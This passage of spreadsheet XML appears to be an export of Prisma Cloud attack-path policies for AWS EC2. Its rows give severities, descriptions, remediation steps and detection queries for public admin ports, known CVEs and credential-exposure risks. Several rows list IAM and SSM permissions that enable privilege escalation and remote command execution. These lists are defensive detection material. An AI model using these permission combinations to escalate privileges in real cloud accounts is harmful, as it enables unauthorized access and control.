Risky permissions on publicly exposed EC2 instances with unrestricted access to admin ports (SSH / RDP) may allow an attacker to get initial access to the instance. The risky IAM write permissions on the instance further help the attackers perform unauthorized IAM actions in the cloud account.
This policy checks for the following risky IAM write permissions:
'iam:AddClientIDToOpenIDConnectProvider', 'iam:AddRoleToInstanceProfile', 'iam:AddUserToGroup', 'iam:ChangePassword', 'iam:CreateAccessKey', 'iam:CreateAccountAlias', 'iam:CreateGroup', 'iam:CreateInstanceProfile', 'iam:CreateLoginProfile', 'iam:CreateOpenIDConnectProvider', 'iam:CreateRole', 'iam:CreateSAMLProvider', 'iam:CreateServiceLinkedRole', 'iam:CreateServiceSpecificCredential', 'iam:CreateUser', 'iam:CreateVirtualMFADevice', 'iam:DeactivateMFADevice', 'iam:DeleteAccessKey', 'iam:DeleteAccountAlias', 'iam:DeleteGroup', 'iam:DeleteInstanceProfile', 'iam:DeleteLoginProfile', 'iam:DeleteOpenIDConnectProvider', 'iam:DeleteRole', 'iam:DeleteSAMLProvider', 'iam:DeleteSSHPublicKey', 'iam:DeleteServerCertificate', 'iam:DeleteServiceLinkedRole', 'iam:DeleteServiceSpecificCredential', 'iam:DeleteSigningCertificate', 'iam:DeleteUser', 'iam:DeleteVirtualMFADevice', 'iam:EnableMFADevice', 'iam:PassRole', 'iam:RemoveClientIDFromOpenIDConnectProvider', 'iam:RemoveRoleFromInstanceProfile', 'iam:RemoveUserFromGroup', 'iam:ResetServiceSpecificCredential', 'iam:ResyncMFADevice', 'iam:SetSecurityTokenServicePreferences', 'iam:UpdateAccessKey', 'iam:UpdateAccountPasswordPolicy', 'iam:UpdateGroup', 'iam:UpdateLoginProfile', 'iam:UpdateOpenIDConnectProviderThumbprint', 'iam:UpdateRole', 'iam:UpdateRoleDescription', 'iam:UpdateSAMLProvider', 'iam:UpdateSSHPublicKey', 'iam:UpdateServerCertificate', 'iam:UpdateServiceSpecificCredential', 'iam:UpdateSigningCertificate', 'iam:UpdateUser', 'iam:UploadSSHPublicKey', 'iam:UploadServerCertificate', 'iam:UploadSigningCertificate'
Immediate attention is required to review the risky write permissions and grant only the least privileges required. Restrict public exposure of admin ports reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X176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66" t="inlineStr"/>
      <c r="Z1766" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0) on Admin ports','AWS EC2 Instance with IAM write permissions')</t>
        </is>
      </c>
      <c r="AA1766" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1766" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:08</t>
        </is>
      </c>
      <c r="AC1766" t="inlineStr"/>
      <c r="AD1766" t="b">
        <v>1</v>
      </c>
      <c r="AE1766" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1766" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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6" t="inlineStr">
        <is>
          <t>81480507-a133-4cfe-814d-97daf9e71cd5</t>
        </is>
      </c>
      <c r="AI1766" t="inlineStr">
        <is>
          <t>cc4c8328-8300-482a-a5b1-4062f79dce42</t>
        </is>
      </c>
      <c r="AJ1766" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1766" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1767">
      <c r="A1767" t="inlineStr"/>
      <c r="B1767" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1767" s="2" t="inlineStr"/>
      <c r="D1767" t="inlineStr"/>
      <c r="E1767" t="inlineStr"/>
      <c r="F1767" t="inlineStr"/>
      <c r="G1767" t="b">
        <v>1</v>
      </c>
      <c r="H17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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1767" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1767" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to publicly exposed and vulnerable AWS EC2 instance [Java Spring Framework, CVE-2021-22118]</t>
        </is>
      </c>
      <c r="L1767" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1767" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1767" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1767" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1767" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1767" t="inlineStr"/>
      <c r="R1767" t="inlineStr"/>
      <c r="S1767" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1767" t="b">
        <v>0</v>
      </c>
      <c r="U1767" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1767" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1767" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed and have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AWS EC2 instance is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Java [CVE-2021-22118] vulnerability and public exposure reported for the AWS EC2 instance as soon as possible.</t>
        </is>
      </c>
      <c r="X176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1767" t="inlineStr"/>
      <c r="Z1767" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2021-22118'))</t>
        </is>
      </c>
      <c r="AA1767" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1767" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:59</t>
        </is>
      </c>
      <c r="AC1767" t="inlineStr"/>
      <c r="AD1767" t="b">
        <v>1</v>
      </c>
      <c r="AE1767" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1767" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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7" t="inlineStr">
        <is>
          <t>1cc351c2-03ba-4d25-8965-1ed912a39bab</t>
        </is>
      </c>
      <c r="AI1767" t="inlineStr">
        <is>
          <t>be5ccebd-6e3b-4ce4-8f74-fed142b3117e</t>
        </is>
      </c>
      <c r="AJ1767" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1767" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1768">
      <c r="A1768" t="inlineStr"/>
      <c r="B1768" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1768" s="2" t="inlineStr"/>
      <c r="D1768" t="n">
        <v>3</v>
      </c>
      <c r="E1768" t="n">
        <v>0</v>
      </c>
      <c r="F1768" t="n">
        <v>0</v>
      </c>
      <c r="G1768" t="b">
        <v>1</v>
      </c>
      <c r="H17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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1768" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1768" t="inlineStr">
        <is>
          <t>Remote command execution risk due to publicly exposed admin ports on AWS EC2 instance with excessive SSM permissions</t>
        </is>
      </c>
      <c r="L1768" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1768" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1768" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1768" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1768" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1768" t="inlineStr"/>
      <c r="R1768" t="inlineStr"/>
      <c r="S1768" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1768" t="b">
        <v>0</v>
      </c>
      <c r="U1768" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1768" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1768" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances which are publicly exposed with unrestricted access to admin ports (SSH / RDP) and have risky SSM permissions.
Risky permissions on publicly exposed EC2 instances with unrestricted access to admin ports (SSH / RDP) may allow an attacker to gain access to the EC2 instance. The risky privilege escalation SSM permissions on the instance further help the attackers to escalate their privilege and perform unauthorized remote command execution actions in the cloud account.
This policy checks for the following risky permissions that could potentially lead to privilege escalation:
'ec2:DescribeInstances', 'ssm:listCommands', 'ssm:listCommandInvocations', 'ssm:sendCommand'
Immediate attention is required to review risky privilege escalation SSM permissions. Restrict public exposure of admin ports reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X176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68" t="inlineStr"/>
      <c r="Z1768" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0) on Admin ports','AWS IAM policy allows Privilege escalation via EC2 describe and SSM list and send command permissions')</t>
        </is>
      </c>
      <c r="AA1768" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1768" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:06</t>
        </is>
      </c>
      <c r="AC1768" t="inlineStr"/>
      <c r="AD1768" t="b">
        <v>1</v>
      </c>
      <c r="AE1768" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1768" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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8" t="inlineStr">
        <is>
          <t>479298fe-f16c-4f42-8ada-5f6598dc88a2</t>
        </is>
      </c>
      <c r="AI1768" t="inlineStr">
        <is>
          <t>c349b764-9b3e-4152-a309-10db67898724</t>
        </is>
      </c>
      <c r="AJ1768" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1768" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1769">
      <c r="A1769" t="inlineStr"/>
      <c r="B1769" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1769" s="2" t="inlineStr"/>
      <c r="D1769" t="inlineStr"/>
      <c r="E1769" t="inlineStr"/>
      <c r="F1769" t="inlineStr"/>
      <c r="G1769" t="b">
        <v>1</v>
      </c>
      <c r="H17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69" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1769" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1769" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable AWS EC2 instance [Apache, CVE-2022-42889]</t>
        </is>
      </c>
      <c r="L1769" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1769" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1769" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1769" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1769" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1769" t="inlineStr"/>
      <c r="R1769" t="inlineStr"/>
      <c r="S1769" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1769" t="b">
        <v>0</v>
      </c>
      <c r="U1769" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1769" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1769" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed and have known exploitable remote code execution vulnerability [CVE-2022-42889].
Remote code execution vulnerability is a critical security concern that enables unauthorized users to execute arbitrary code on a system, potentially leading to data breaches, system compromise, or unauthorized data manipulation. The fact that the EC2 instance is publicly exposed makes it an easy target for an attacker to compromise the affected system. 
Immediate attention is required to remediate the Apache [CVE-2022-42889] vulnerability and public exposure reported for the affected AWS EC2 instance as soon as possible</t>
        </is>
      </c>
      <c r="X176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1769" t="inlineStr"/>
      <c r="Z1769" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-42889'))</t>
        </is>
      </c>
      <c r="AA1769" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1769" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC1769" t="inlineStr"/>
      <c r="AD1769" t="b">
        <v>1</v>
      </c>
      <c r="AE1769" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1769" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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69" t="inlineStr">
        <is>
          <t>60fb223b-8324-4577-8860-62a884c81931</t>
        </is>
      </c>
      <c r="AI1769" t="inlineStr">
        <is>
          <t>53eebd2c-f7f2-4cf5-ae9d-80fc67612524</t>
        </is>
      </c>
      <c r="AJ1769" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1769" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1770">
      <c r="A1770" t="inlineStr"/>
      <c r="B1770" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1770" s="2" t="inlineStr"/>
      <c r="D1770" t="inlineStr"/>
      <c r="E1770" t="inlineStr"/>
      <c r="F1770" t="inlineStr"/>
      <c r="G1770" t="b">
        <v>1</v>
      </c>
      <c r="H17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70" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1770" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1770" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to sensitive information detected in server response on AWS EC2 instance with privilege escalation permissions</t>
        </is>
      </c>
      <c r="L1770" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,DATA_EXFILTRATION</t>
        </is>
      </c>
      <c r="M1770" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1770" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1770" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1770" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q1770" t="inlineStr"/>
      <c r="R1770" t="inlineStr"/>
      <c r="S1770" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1770" t="b">
        <v>0</v>
      </c>
      <c r="U1770" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1770" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1770" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances with sensitive information detected in server responses and having privilege escalation permissions.
Sensitive information in server responses includes potential unauthorized access and exploitation. When combined with elevated EC2 permissions and sensitive credentials in the response, attackers can escalate privileges, gain control over resources, and execute malicious actions within the environment.
This policy checks for the following privilege escalation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the server response, add the WAAS rule to prevent this activity, update and remove instance role credentials, and address risky privilege escalation permissions.</t>
        </is>
      </c>
      <c r="X1770" t="inlineStr">
        <is>
          <t>[WAAS]
1. Open Console, and go to 'Runtime Security' 
2. Create a WAAS rule by selecting the WAAS sub-menu item under the Defend menu.
3. Choose the relevant tab for the workload.
4. Follow the instructions to deploy the in-line rule found at https://docs.prismacloud.io/en/enterprise-edition/content-collections/runtime-security/waas/deploy-waas/hosts
5. Set the protection effect in the created WAAS rule to \"Prevent\" for the protection setting 'Detect Information Leakage'
[PERMISSION]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70" t="inlineStr"/>
      <c r="Z1770" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'aws-ec2-describe-instances' ) AND finding.name contains all ('AWS EC2 instance with privilege escalation risk permissions','Sensitive information detected in server response')</t>
        </is>
      </c>
      <c r="AA1770" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1770" t="inlineStr">
        <is>
          <t>2024-09-02 06:33:47</t>
        </is>
      </c>
      <c r="AC1770" t="inlineStr"/>
      <c r="AD1770" t="b">
        <v>1</v>
      </c>
      <c r="AE1770" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1770" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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70" t="inlineStr">
        <is>
          <t>d8c26a06-a793-4f78-ac38-84ae5b7b52fe</t>
        </is>
      </c>
      <c r="AI1770" t="inlineStr">
        <is>
          <t>64246a3a-828b-49c2-9e61-1a1a05ce2032</t>
        </is>
      </c>
      <c r="AJ1770" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1770" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1771">
      <c r="A1771" t="inlineStr"/>
      <c r="B1771" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1771" s="2" t="inlineStr"/>
      <c r="D1771" t="inlineStr"/>
      <c r="E1771" t="inlineStr"/>
      <c r="F1771" t="inlineStr"/>
      <c r="G1771" t="b">
        <v>1</v>
      </c>
      <c r="H17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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1771" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1771" t="inlineStr">
        <is>
          <t>IP Hijacking risk due to an AWS EC2 instance with unusual usage of instance role credentials and Elastic IP Hijacking permissions</t>
        </is>
      </c>
      <c r="L1771" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1771" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1771" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1771" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1771" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q1771" t="inlineStr"/>
      <c r="R1771" t="inlineStr"/>
      <c r="S1771" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1771" t="b">
        <v>0</v>
      </c>
      <c r="U1771" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1771" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1771" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances with unusual usage of instance role credentials and has Elastic IP Hijacking permissions.
Risky permissions on AWS EC2 instances with unusual usage of instance role credentials may allow an attacker to get initial access to the instance. EC2 instance with Elastic IP Hijacking permissions could further expand the surface of the attack and grant malicious actors to misuse the IP. Unusual EC2 role credential usage from outside the cloud may indicate instance is already compromised.
This policy checks for the following risky Elastic IP Hijacking permissions:
'ec2:DisassociateAddress', 'ec2:EnableAddressTransfer'
Immediate attention is required to review unusual usage activity of instance role credentials and Elastic IP Hijacking permissions.</t>
        </is>
      </c>
      <c r="X1771"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71" t="inlineStr"/>
      <c r="Z1771" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('Unusual usage of Workload Credentials from outside the Cloud','AWS EC2 IAM role with Elastic IP Hijacking permissions')</t>
        </is>
      </c>
      <c r="AA1771" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1771" t="inlineStr">
        <is>
          <t>2024-02-02 08:15:32</t>
        </is>
      </c>
      <c r="AC1771" t="inlineStr"/>
      <c r="AD1771" t="b">
        <v>1</v>
      </c>
      <c r="AE1771" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1771" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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1" t="inlineStr">
        <is>
          <t>d9c4c1f6-f724-416b-9a79-f62e5314ff1f</t>
        </is>
      </c>
      <c r="AI1771" t="inlineStr">
        <is>
          <t>0c22571d-dbd4-4cb3-8b0f-d103df5c8919</t>
        </is>
      </c>
      <c r="AJ1771" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1771" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1772">
      <c r="A1772" t="inlineStr"/>
      <c r="B1772" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1772" s="2" t="inlineStr"/>
      <c r="D1772" t="inlineStr"/>
      <c r="E1772" t="inlineStr"/>
      <c r="F1772" t="inlineStr"/>
      <c r="G1772" t="b">
        <v>1</v>
      </c>
      <c r="H17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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1772" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1772" t="inlineStr">
        <is>
          <t>Remote code execution (RCE) risk due to a publicly exposed AWS EC2 instance with Spring4Shell vulnerability</t>
        </is>
      </c>
      <c r="L1772" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1772" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1772" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1772" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1772" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1772" t="inlineStr"/>
      <c r="R1772" t="inlineStr"/>
      <c r="S1772" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1772" t="b">
        <v>0</v>
      </c>
      <c r="U1772" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1772" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1772" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances which have Spring4Shell vulnerabilities and are publicly exposed. 
The Spring4Shell vulnerability allows attackers to exploit the web server pathway, making all connected applications vulnerable to Remote Code Execution (RCE). Spring4Shell vulnerability is very critical and can compromise the confidentiality, integrity, and availability of data managed by a vulnerable application EC2 instance. The fact that the EC2 instance is publicly exposed makes it an easy target for an attacker to compromise the affected system. 
Immediate attention is required to remediate the Spring4Shell vulnerabilities [CVE-2022-22965 and CVE-2022-22963] and public exposure reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X177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1772" t="inlineStr"/>
      <c r="Z1772" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-22963', 'CVE-2022-22965'))</t>
        </is>
      </c>
      <c r="AA1772" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1772" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC1772" t="inlineStr"/>
      <c r="AD1772" t="b">
        <v>1</v>
      </c>
      <c r="AE1772" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1772" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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2" t="inlineStr">
        <is>
          <t>43c7ac15-3779-4028-9665-167d461abbd2</t>
        </is>
      </c>
      <c r="AI1772" t="inlineStr">
        <is>
          <t>fb9f0ae3-cb6e-4ac9-8e4b-5a0123a4e479</t>
        </is>
      </c>
      <c r="AJ1772" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1772" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1773">
      <c r="A1773" t="inlineStr"/>
      <c r="B1773" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1773" s="2" t="inlineStr"/>
      <c r="D1773" t="inlineStr"/>
      <c r="E1773" t="inlineStr"/>
      <c r="F1773" t="inlineStr"/>
      <c r="G1773" t="b">
        <v>1</v>
      </c>
      <c r="H17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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1773" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1773" t="inlineStr">
        <is>
          <t>Credential exposure risk due to AWS EC2 instance with unusual usage of instance role credentials and credentials exposure permissions</t>
        </is>
      </c>
      <c r="L1773" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1773" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1773" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1773" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1773" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q1773" t="inlineStr"/>
      <c r="R1773" t="inlineStr"/>
      <c r="S1773" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1773" t="b">
        <v>0</v>
      </c>
      <c r="U1773" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1773" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1773" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances with unusual usage of instance role credentials and has credentials exposure permissions.
Risky permissions on AWS EC2 instances with unusual usage of instance role credentials may allow an attacker to get initial access to the instance. EC2 instance with credentials exposure permissions could further expand the surface of the attack and grant access to credentials for critical resources hosted on AWS. Unusual EC2 role credential usage from outside the cloud may indicate instance is already compromised.
This policy checks for the following risky permissions that could potentially lead to privilege escalation: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Immediate attention is required to review unusual usage activity of instance role credentials and risky credentials exposure permissions.</t>
        </is>
      </c>
      <c r="X1773"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73" t="inlineStr"/>
      <c r="Z1773" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('Unusual usage of Workload Credentials from outside the Cloud','AWS EC2 with IAM role attached has credentials exposure permissions')</t>
        </is>
      </c>
      <c r="AA1773" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1773" t="inlineStr">
        <is>
          <t>2024-02-02 08:15:31</t>
        </is>
      </c>
      <c r="AC1773" t="inlineStr"/>
      <c r="AD1773" t="b">
        <v>1</v>
      </c>
      <c r="AE1773" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1773" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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3" t="inlineStr">
        <is>
          <t>8992fd21-a4e9-4660-a035-c1037b92bdef</t>
        </is>
      </c>
      <c r="AI1773" t="inlineStr">
        <is>
          <t>f319f955-cbd5-4a23-9a75-6ffca220fb65</t>
        </is>
      </c>
      <c r="AJ1773" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1773" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1774">
      <c r="A1774" t="inlineStr"/>
      <c r="B1774" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1774" s="2" t="inlineStr"/>
      <c r="D1774" t="inlineStr"/>
      <c r="E1774" t="inlineStr"/>
      <c r="F1774" t="inlineStr"/>
      <c r="G1774" t="b">
        <v>1</v>
      </c>
      <c r="H17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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1774" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1774" t="inlineStr">
        <is>
          <t>Denial of Service (DoS) exploitation attempt on AWS EC2 instance with known exploitable vulnerability [WordPress, CVE-2018-6389]</t>
        </is>
      </c>
      <c r="L1774" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M1774" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1774" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1774" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1774" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q1774" t="inlineStr"/>
      <c r="R1774" t="inlineStr"/>
      <c r="S1774" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1774" t="b">
        <v>0</v>
      </c>
